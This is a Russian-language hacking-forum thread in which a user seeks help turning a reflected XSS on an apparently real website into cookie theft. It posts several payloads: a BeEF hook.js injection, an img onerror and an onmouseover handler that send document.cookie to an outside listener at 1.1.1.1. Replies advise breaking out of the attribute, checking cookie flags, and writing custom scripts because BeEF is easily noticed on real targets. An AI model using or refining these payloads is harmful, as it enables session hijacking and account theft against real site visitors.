• XSS.stack #1 – первый литературный журнал от юзеров форума

XSS вида 'onmouseover='alert(1)'

Отслеживать
Limbo001

Limbo001

RAID-массив
Пользователь
Регистрация
02.02.2022
Сообщения
66
Реакции
45
Всем хай. Нашел xss вида
JavaScript: 
url/?i0qei'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'gbll3=1

Пробовал закидывать через beef hook.js вместо alert(1)
JavaScript: 
this.src='http://1.1.1.1:3000/hook.js''+document.cookie;

По итогу в burp ответ отображается в
JavaScript: 
<link href="url/i0qei'onmouseover='this_src='http://1_1_1_1:3000/hook_js'+document_cookie;'style='position:absolute;width:100%;height:100%;top:0;left:0;'gbll3=1&amp;format=feed&amp;type=rss"

В конце урла безуспешно:
Код: 
<script>http://1.1.1.1:3000/hook.js</script>

<script src="http://1.1.1.1:3000/hook.js"></script>

Но сессия в beef не появляется. Что не так может быть? Может попробовать на VPS через PHP попробовать cookie получить? Подскажите братки по коду)
 
Не совсем понятен контекст XSS исходя из того как ты описал. Если это Reflected XSS в атрибуте, то попробуй закрыть текущий атрибут " и добавить свой. Или же вовсе закрыть текущий тег и вставить свой. Может там WAF при этом помешает.
 
greywraith сказал(а):
Посетите страницу и проверьте наличие ошибок в консоли браузера.
Код: 
Error: Got a request https://example/media/plg_jchoptimize/assets3/gz/1/1/5040d1899d7b611489ac42dd4406dcf0.css without a browsingContextID set


Error: Got a request https://example/templates/webhit/css/template.css without a browsingContextID set

Error: Got a request https://fonts.googleapis.com/css?family=Open+Sans:300,300italic,regular,italic,600,600italic,700,700italic,800,800italic&subset=latin without a browsingContextID set

asResource resource://devtools/server/actors/network-monitor/network-event-actor.js:109
    asResource self-hosted:1178
    httpFailedOpeningRequest resource://devtools/server/actors/resources/network-events-content.js:86
    httpFailedOpeningRequest self-hosted:1178
    _resurrectSource resource://devtools/server/actors/thread.js:2168
    AsyncFunctionNext self-hosted:689
    openPromptSync resource://gre/modules/Prompter.jsm:1117
    alertCheck resource://gre/modules/Prompter.jsm:1421
    onmouseover https://example/a/b'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'gbll3=1:1
 
chaseCake сказал(а):
Не совсем понятен контекст XSS исходя из того как ты описал. Если это Reflected XSS в атрибуте, то попробуй закрыть текущий атрибут " и добавить свой. Или же вовсе закрыть текущий тег и вставить свой. Может там WAF при этом помешает.
Данный XSS на основе CSS.

Пробовал закидывать слушатель( на python) для просмотра cookie:
JavaScript: 
 <img src=1 onerror="this.src='http://1.1.1.1:3500/'+document.cookie'">%27style%3d%27position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%27gbll3=1
По итогу в response только в link ref запись попадает

Через
JavaScript: 
onmouseover='document.createElement("img").src="http://1.1.1.1:3500"+document.cookie'style='position:absolute;width:100%;height:100%;top:0;left:0;'gbll3=1
не пашет

Код обфусцировал через burp decoder

Через CSS - onmouseover(работает при наведении курсора мыши на введенный элемент) реально вообще cookie вытянуть? Некоторые пишут, что xss на основе css мертва(((
 
Limbo001 сказал(а):
Данный XSS на основе CSS.

Пробовал закидывать слушатель( на python) для просмотра cookie:
JavaScript: 
 <img src=1 onerror="this.src='http://1.1.1.1:3500/'+document.cookie'">%27style%3d%27position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%27gbll3=1
По итогу в response только в link ref запись попадает

Через
JavaScript: 
onmouseover='document.createElement("img").src="http://1.1.1.1:3500"+document.cookie'style='position:absolute;width:100%;height:100%;top:0;left:0;'gbll3=1
не пашет

Код обфусцировал через burp decoder

Через CSS - onmouseover(работает при наведении курсора мыши на введенный элемент) реально вообще cookie вытянуть? Некоторые пишут, что xss на основе css мертва(((
Бред, че мертва? Зачем тебе beef, его вообще кто-то еще использует? Посмотри сначала какие флаги безопасности висят на куках, может ты вообще не имеешь посредством ЖС к ним доступа.
 
0x60b1iN сказал(а):
Бред, че мертва? Зачем тебе beef, его вообще кто-то еще использует? Посмотри сначала какие флаги безопасности висят на куках, может ты вообще не имеешь посредством ЖС к ним доступа.
дыа, норм софтинка биф.
с чегго бы он ниработал?
 
Кузя сказал(а):
дыа, норм софтинка биф.
с чегго бы он ниработал?
beef в основном в песочницах( тренировочных средах) заходит, на реальных таргетах редко кто его использует, потому что палевно. В основном сами скрипты пишут)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх